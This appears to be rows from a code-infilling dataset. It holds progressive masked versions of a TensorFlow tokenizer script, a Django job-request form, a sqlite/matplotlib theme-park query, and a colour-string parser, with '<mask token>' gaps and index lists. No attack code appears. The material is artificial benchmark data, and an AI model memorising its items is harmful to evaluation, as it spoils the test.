targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w for w in words if w]
def create_vocabulary(vocabulary_path, json_vocab_path):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
We write it to vocabulary_path in a one-token-per-line format, so that later
token in the first line gets id=0, second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
json_vocab_path: data file that will be used to create vocabulary.
"""
if not gfile.Exists(vocabulary_path):
print('Transform vocabulary to %s' % vocabulary_path)
with gfile.GFile(json_vocab_path, mode='rb') as f:
jvocab = json.load(f)
vocab = jvocab['w2id']
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)
with gfile.GFile(vocabulary_path, mode='wb') as vocab_file:
for w in vocab_list:
vocab_file.write(w + b'\n')
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode='rb') as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip() for line in rev_vocab]
vocab = dict([(x, y) for y, x in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError('Vocabulary file %s not found.', vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary):
"""Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
Args:
sentence: the sentence in bytes format to convert to token-ids.
vocabulary: a dictionary mapping tokens to integers.
Returns:
a list of integers, the token-ids for the sentence.
"""
return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]
def data_to_token_ids(data_path, target_path, vocabulary_path):
"""Tokenize data file and turn into token-ids using given vocabulary file.
This function loads data line-by-line from data_path, calls the above
sentence_to_token_ids, and saves the result to target_path. See comment
for sentence_to_token_ids on the details of token-ids format.
Args:
data_path: path to the data file in one-sentence-per-line format.
target_path: path where the file with token-ids will be created.
vocabulary_path: path to the vocabulary file.
"""
if not gfile.Exists(target_path):
print('Tokenizing data in %s' % data_path)
vocab, _ = initialize_vocabulary(vocabulary_path)
with gfile.GFile(data_path, mode='rb') as data_file:
with gfile.GFile(target_path, mode='w') as tokens_file:
counter = 0
for line in data_file:
counter += 1
if counter % 100000 == 0:
print(' tokenizing line %d' % counter)
token_ids = sentence_to_token_ids(tf.compat.as_bytes(
line), vocab)
tokens_file.write(' '.join([str(tok) for tok in
token_ids]) + '\n')
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file
):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
A tuple of 6 elements:
(1) path to the token-ids for src training data-set,
(2) path to the token-ids for target training data-set,
(3) path to the token-ids for src development data-set,
(4) path to the token-ids for src development data-set,
(5) path to the src vocabulary file,
(6) path to the src vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
vocab_path = os.path.join(data_dir, 'vocab.txt')
create_vocabulary(vocab_path, vocab_file)
src_train_ids_path = train_path + '.src.ids'
targ_train_ids_path = train_path + '.targ.ids'
data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)
data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)
src_dev_ids_path = dev_path + '.src.ids'
targ_dev_ids_path = dev_path + '.targ.ids'
data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,
targ_dev_ids_path, vocab_path)
| <mask token>
_PAD = b'_PAD'
_GO = b'_GO'
_EOS = b'_EOS'
_UNK = b'_UNK'
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
_WORD_SPLIT = re.compile(b'([.,!?"\':;)(])')
_DIGIT_RE = re.compile(b'\\d')
def get_qa_set(directory, jsonl_file):
"""Download the WMT en-fr training corpus to directory unless it's there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(
targ_path, 'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w for w in words if w]
def create_vocabulary(vocabulary_path, json_vocab_path):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
We write it to vocabulary_path in a one-token-per-line format, so that later
token in the first line gets id=0, second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
json_vocab_path: data file that will be used to create vocabulary.
"""
if not gfile.Exists(vocabulary_path):
print('Transform vocabulary to %s' % vocabulary_path)
with gfile.GFile(json_vocab_path, mode='rb') as f:
jvocab = json.load(f)
vocab = jvocab['w2id']
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)
with gfile.GFile(vocabulary_path, mode='wb') as vocab_file:
for w in vocab_list:
vocab_file.write(w + b'\n')
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode='rb') as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip() for line in rev_vocab]
vocab = dict([(x, y) for y, x in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError('Vocabulary file %s not found.', vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary):
"""Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
Args:
sentence: the sentence in bytes format to convert to token-ids.
vocabulary: a dictionary mapping tokens to integers.
Returns:
a list of integers, the token-ids for the sentence.
"""
return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]
def data_to_token_ids(data_path, target_path, vocabulary_path):
"""Tokenize data file and turn into token-ids using given vocabulary file.
This function loads data line-by-line from data_path, calls the above
sentence_to_token_ids, and saves the result to target_path. See comment
for sentence_to_token_ids on the details of token-ids format.
Args:
data_path: path to the data file in one-sentence-per-line format.
target_path: path where the file with token-ids will be created.
vocabulary_path: path to the vocabulary file.
"""
if not gfile.Exists(target_path):
print('Tokenizing data in %s' % data_path)
vocab, _ = initialize_vocabulary(vocabulary_path)
with gfile.GFile(data_path, mode='rb') as data_file:
with gfile.GFile(target_path, mode='w') as tokens_file:
counter = 0
for line in data_file:
counter += 1
if counter % 100000 == 0:
print(' tokenizing line %d' % counter)
token_ids = sentence_to_token_ids(tf.compat.as_bytes(
line), vocab)
tokens_file.write(' '.join([str(tok) for tok in
token_ids]) + '\n')
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file
):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
A tuple of 6 elements:
(1) path to the token-ids for src training data-set,
(2) path to the token-ids for target training data-set,
(3) path to the token-ids for src development data-set,
(4) path to the token-ids for src development data-set,
(5) path to the src vocabulary file,
(6) path to the src vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
vocab_path = os.path.join(data_dir, 'vocab.txt')
create_vocabulary(vocab_path, vocab_file)
src_train_ids_path = train_path + '.src.ids'
targ_train_ids_path = train_path + '.targ.ids'
data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)
data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)
src_dev_ids_path = dev_path + '.src.ids'
targ_dev_ids_path = dev_path + '.targ.ids'
data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,
targ_dev_ids_path, vocab_path)
| # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
import json
from tensorflow.python.platform import gfile
import tensorflow as tf
# Special vocabulary symbols - we always put them at the start.
_PAD = b"_PAD"
_GO = b"_GO"
_EOS = b"_EOS"
_UNK = b"_UNK"
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
# Regular expressions used to tokenize.
_WORD_SPLIT = re.compile(b"([.,!?\"':;)(])")
_DIGIT_RE = re.compile(br"\d")
def get_qa_set(directory, jsonl_file):
"""Download the WMT en-fr training corpus to directory unless it's there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path,'w') as srcfile, open(targ_path,'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w for w in words if w]
def create_vocabulary(vocabulary_path, json_vocab_path):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
We write it to vocabulary_path in a one-token-per-line format, so that later
token in the first line gets id=0, second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
json_vocab_path: data file that will be used to create vocabulary.
"""
if not gfile.Exists(vocabulary_path):
print("Transform vocabulary to %s" % vocabulary_path)
with gfile.GFile(json_vocab_path, mode="rb") as f:
jvocab = json.load(f)
vocab = jvocab['w2id']
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)
with gfile.GFile(vocabulary_path, mode="wb") as vocab_file:
for w in vocab_list:
vocab_file.write(w + b"\n")
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode="rb") as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip() for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError("Vocabulary file %s not found.", vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary):
"""Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
Args:
sentence: the sentence in bytes format to convert to token-ids.
vocabulary: a dictionary mapping tokens to integers.
Returns:
a list of integers, the token-ids for the sentence.
"""
return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]
def data_to_token_ids(data_path, target_path, vocabulary_path):
"""Tokenize data file and turn into token-ids using given vocabulary file.
This function loads data line-by-line from data_path, calls the above
sentence_to_token_ids, and saves the result to target_path. See comment
for sentence_to_token_ids on the details of token-ids format.
Args:
data_path: path to the data file in one-sentence-per-line format.
target_path: path where the file with token-ids will be created.
vocabulary_path: path to the vocabulary file.
"""
if not gfile.Exists(target_path):
print("Tokenizing data in %s" % data_path)
vocab, _ = initialize_vocabulary(vocabulary_path)
with gfile.GFile(data_path, mode="rb") as data_file:
with gfile.GFile(target_path, mode="w") as tokens_file:
counter = 0
for line in data_file:
counter += 1
if counter % 100000 == 0:
print(" tokenizing line %d" % counter)
token_ids = sentence_to_token_ids(tf.compat.as_bytes(line), vocab)
tokens_file.write(" ".join([str(tok) for tok in token_ids]) + "\n")
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
A tuple of 6 elements:
(1) path to the token-ids for src training data-set,
(2) path to the token-ids for target training data-set,
(3) path to the token-ids for src development data-set,
(4) path to the token-ids for src development data-set,
(5) path to the src vocabulary file,
(6) path to the src vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
# Get wmt data to the specified directory.
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
# Create vocabularies of the appropriate sizes.
vocab_path = os.path.join(data_dir, "vocab.txt")
create_vocabulary(vocab_path, vocab_file)
# Create token ids for the training data.
src_train_ids_path = train_path + ".src.ids"
targ_train_ids_path = train_path + ".targ.ids"
data_to_token_ids(train_path + ".src", src_train_ids_path, vocab_path)
data_to_token_ids(train_path + ".targ", targ_train_ids_path, vocab_path)
# Create token ids for the development data.
src_dev_ids_path = dev_path + ".src.ids"
targ_dev_ids_path = dev_path + ".targ.ids"
data_to_token_ids(dev_path + ".src", src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + ".targ", targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path,
src_dev_ids_path, targ_dev_ids_path,
vocab_path)
| [
2,
3,
7,
8,
10
] |
695 | 3887516e4222504defe439e62bd24b12db3cdd84 | <mask token>
| <mask token>
class WorkRequestForm(forms.ModelForm):
<mask token>
class Meta:
model = HhRequest
fields = 'profile', 'sphere', 'experience', 'work_request', 'resume'
widgets = {'profile': forms.Select(attrs={'id': 'profile',
'required': '', 'class': 'browser-default custom-select'}),
'sphere': forms.Select(attrs={'id': 'sphere', 'required': '',
'class': 'browser-default custom-select'}), 'experience': forms
.Select(attrs={'id': 'experience', 'required': '', 'class':
'browser-default custom-select'}), 'work_request': forms.Select
(attrs={'id': 'work_request', 'required': '', 'class':
'browser-default custom-select'}), 'resume': forms.FileInput(
attrs={'id': 'hh_resume', 'required': '', 'class':
'custom-file-input', 'lang': 'ru'})}
| <mask token>
class WorkRequestForm(forms.ModelForm):
"""Форма заявки на премию"""
class Meta:
model = HhRequest
fields = 'profile', 'sphere', 'experience', 'work_request', 'resume'
widgets = {'profile': forms.Select(attrs={'id': 'profile',
'required': '', 'class': 'browser-default custom-select'}),
'sphere': forms.Select(attrs={'id': 'sphere', 'required': '',
'class': 'browser-default custom-select'}), 'experience': forms
.Select(attrs={'id': 'experience', 'required': '', 'class':
'browser-default custom-select'}), 'work_request': forms.Select
(attrs={'id': 'work_request', 'required': '', 'class':
'browser-default custom-select'}), 'resume': forms.FileInput(
attrs={'id': 'hh_resume', 'required': '', 'class':
'custom-file-input', 'lang': 'ru'})}
| from django import forms
from .models import HhRequest
class WorkRequestForm(forms.ModelForm):
"""Форма заявки на премию"""
class Meta:
model = HhRequest
fields = 'profile', 'sphere', 'experience', 'work_request', 'resume'
widgets = {'profile': forms.Select(attrs={'id': 'profile',
'required': '', 'class': 'browser-default custom-select'}),
'sphere': forms.Select(attrs={'id': 'sphere', 'required': '',
'class': 'browser-default custom-select'}), 'experience': forms
.Select(attrs={'id': 'experience', 'required': '', 'class':
'browser-default custom-select'}), 'work_request': forms.Select
(attrs={'id': 'work_request', 'required': '', 'class':
'browser-default custom-select'}), 'resume': forms.FileInput(
attrs={'id': 'hh_resume', 'required': '', 'class':
'custom-file-input', 'lang': 'ru'})}
| from django import forms
from .models import HhRequest
class WorkRequestForm(forms.ModelForm):
"""Форма заявки на премию"""
class Meta:
model = HhRequest
fields = ('profile', 'sphere', 'experience', 'work_request', 'resume')
widgets = {
'profile': forms.Select(
attrs={
'id': 'profile',
'required': '',
'class': 'browser-default custom-select'
}
),
'sphere': forms.Select(
attrs={
'id': 'sphere',
'required': '',
'class': 'browser-default custom-select'
}
),
'experience': forms.Select(
attrs={
'id': 'experience',
'required': '',
'class': 'browser-default custom-select'
}
),
'work_request': forms.Select(
attrs={
'id': 'work_request',
'required': '',
'class': 'browser-default custom-select'
}
),
'resume': forms.FileInput(
attrs={
'id': 'hh_resume',
'required': '',
'class': 'custom-file-input',
'lang': 'ru'
}
),
}
| [
0,
1,
2,
3,
4
] |
696 | c19c3f580d7555379bd7e077b0264a3784179e93 | <mask token>
| <mask token>
c.execute(
"SELECT a.Name, count(c.visitorID) FROM attraction as a, checkin c WHERE a.AttractionID = c.attraction AND a.Category like 'Thrill Rides%' GROUP BY a.AttractionID "
)
<mask token>
print(thrillRidesVisitsResult)
<mask token>
c.close()
plt.pie(thrillRidesVisitsDataFrame['visits_count'], labels=
thrillRidesVisitsDataFrame['ride_name'], autopct='%1.1f%%', shadow=False)
plt.axis('equal')
plt.show()
| <mask token>
db_filename = 'readonly/dinofunworld.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
c.execute(
"SELECT a.Name, count(c.visitorID) FROM attraction as a, checkin c WHERE a.AttractionID = c.attraction AND a.Category like 'Thrill Rides%' GROUP BY a.AttractionID "
)
thrillRidesVisitsResult = c.fetchall()
print(thrillRidesVisitsResult)
thrillRidesVisitsDataFrame = pd.DataFrame.from_records(thrillRidesVisitsResult,
columns=['ride_name', 'visits_count'])
c.close()
plt.pie(thrillRidesVisitsDataFrame['visits_count'], labels=
thrillRidesVisitsDataFrame['ride_name'], autopct='%1.1f%%', shadow=False)
plt.axis('equal')
plt.show()
| import sqlite3
import pandas as pd
import matplotlib.pyplot as plt
db_filename = 'readonly/dinofunworld.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
c.execute(
"SELECT a.Name, count(c.visitorID) FROM attraction as a, checkin c WHERE a.AttractionID = c.attraction AND a.Category like 'Thrill Rides%' GROUP BY a.AttractionID "
)
thrillRidesVisitsResult = c.fetchall()
print(thrillRidesVisitsResult)
thrillRidesVisitsDataFrame = pd.DataFrame.from_records(thrillRidesVisitsResult,
columns=['ride_name', 'visits_count'])
c.close()
plt.pie(thrillRidesVisitsDataFrame['visits_count'], labels=
thrillRidesVisitsDataFrame['ride_name'], autopct='%1.1f%%', shadow=False)
plt.axis('equal')
plt.show()
| import sqlite3
import pandas as pd
#%matplotlib inline
import matplotlib.pyplot as plt
db_filename = 'readonly/dinofunworld.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
c.execute("SELECT a.Name, count(c.visitorID) \
FROM attraction as a, checkin c \
WHERE \
a.AttractionID = c.attraction \
AND a.Category like 'Thrill Rides%' \
GROUP BY a.AttractionID \
")
thrillRidesVisitsResult = c.fetchall()
print(thrillRidesVisitsResult)
thrillRidesVisitsDataFrame = pd.DataFrame.from_records(thrillRidesVisitsResult, columns=['ride_name', 'visits_count'])
c.close()
plt.pie(thrillRidesVisitsDataFrame['visits_count'], labels=thrillRidesVisitsDataFrame['ride_name'], autopct='%1.1f%%', shadow=False)
plt.axis('equal')
plt.show() | [
0,
1,
2,
3,
4
] |
697 | 978f3979aee1c4361483fd61b54352e7fff8d3b3 | <mask token>
def parse_hex3(hex3):
"""Example: #a3d"""
if (m := re.match('^#?([0-9A-Fa-f]{3})$', hex3.strip())):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f'String {hex3!r} does not match hex3 format.')
<mask token>
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if (m := re.match(
'^rgb\\(\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_float format.'
)
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(
f'String {rgbfunc!r} does not match rgbfunc_percent format.')
<mask token>
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f'Color {name!r} is not named in the crayola dataset.'
)
return parse_hex6(_crayola_names[name])
<mask token>
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(
f'Color {name!r} is not named in the meodai-best dataset.')
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f'Color {name!r} is not named in the meodai dataset.')
return parse_hex6(_meodai_names[name])
def parse(colstr, *, hex6=True, hex3=True, rgbfunc_int=True, rgbfunc_float=
True, rgbfunc_percent=True, name_css=True, name_crayola=True, name_xkcd
=True, name_meodai_best=True, name_meodai=True):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f'Could not find a working parser for {colstr!r}.')
return res
| <mask token>
def parse_hex6(hex6):
"""Example: #ab34df"""
if (m := re.match('^#?([0-9A-Fa-f]{6})$', hex6.strip())):
h = int(m.group(1), 16)
return hex_to_rgb(h)
raise ValueError(f'String {hex6!r} does not match hex6 format.')
def parse_hex3(hex3):
"""Example: #a3d"""
if (m := re.match('^#?([0-9A-Fa-f]{3})$', hex3.strip())):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f'String {hex3!r} does not match hex3 format.')
def parse_rgbfunc_int(rgbfunc):
"""Example: rgb(171, 52, 223)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*\\)$',
rgbfunc.strip())):
t = tuple(map(int, m.groups()))
if not any(n > 255 for n in t):
return t
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_int format.')
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if (m := re.match(
'^rgb\\(\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_float format.'
)
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(
f'String {rgbfunc!r} does not match rgbfunc_percent format.')
def parse_name_css(name):
name = name.lower()
if name not in _css_names:
raise ValueError(f'Color {name!r} is not named in the CSS dataset.')
return parse_hex6(_css_names[name])
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f'Color {name!r} is not named in the crayola dataset.'
)
return parse_hex6(_crayola_names[name])
<mask token>
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(
f'Color {name!r} is not named in the meodai-best dataset.')
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f'Color {name!r} is not named in the meodai dataset.')
return parse_hex6(_meodai_names[name])
def parse(colstr, *, hex6=True, hex3=True, rgbfunc_int=True, rgbfunc_float=
True, rgbfunc_percent=True, name_css=True, name_crayola=True, name_xkcd
=True, name_meodai_best=True, name_meodai=True):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f'Could not find a working parser for {colstr!r}.')
return res
| <mask token>
__all__ = ['parse_hex6', 'parse_hex3', 'parse_rgbfunc_int',
'parse_rgbfunc_float', 'parse_rgbfunc_percent', 'parse_name_css',
'parse_name_crayola', 'parse_name_xkcd', 'parse_name_meodai_best',
'parse_name_meodai', 'parse']
_css_names = json.loads(resources.read_text('pilutils.colornames', 'css.json'))
_crayola_names = json.loads(resources.read_text('pilutils.colornames',
'crayola.json'))
_xkcd_names = json.loads(resources.read_text('pilutils.colornames',
'xkcd.json'))
_meodai_best_names = json.loads(resources.read_text('pilutils.colornames',
'meodai-best.json'))
_meodai_names = json.loads(resources.read_text('pilutils.colornames',
'meodai.json'))
def parse_hex6(hex6):
"""Example: #ab34df"""
if (m := re.match('^#?([0-9A-Fa-f]{6})$', hex6.strip())):
h = int(m.group(1), 16)
return hex_to_rgb(h)
raise ValueError(f'String {hex6!r} does not match hex6 format.')
def parse_hex3(hex3):
"""Example: #a3d"""
if (m := re.match('^#?([0-9A-Fa-f]{3})$', hex3.strip())):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f'String {hex3!r} does not match hex3 format.')
def parse_rgbfunc_int(rgbfunc):
"""Example: rgb(171, 52, 223)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*\\)$',
rgbfunc.strip())):
t = tuple(map(int, m.groups()))
if not any(n > 255 for n in t):
return t
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_int format.')
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if (m := re.match(
'^rgb\\(\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*\\)$'
, rgbfunc.strip())):
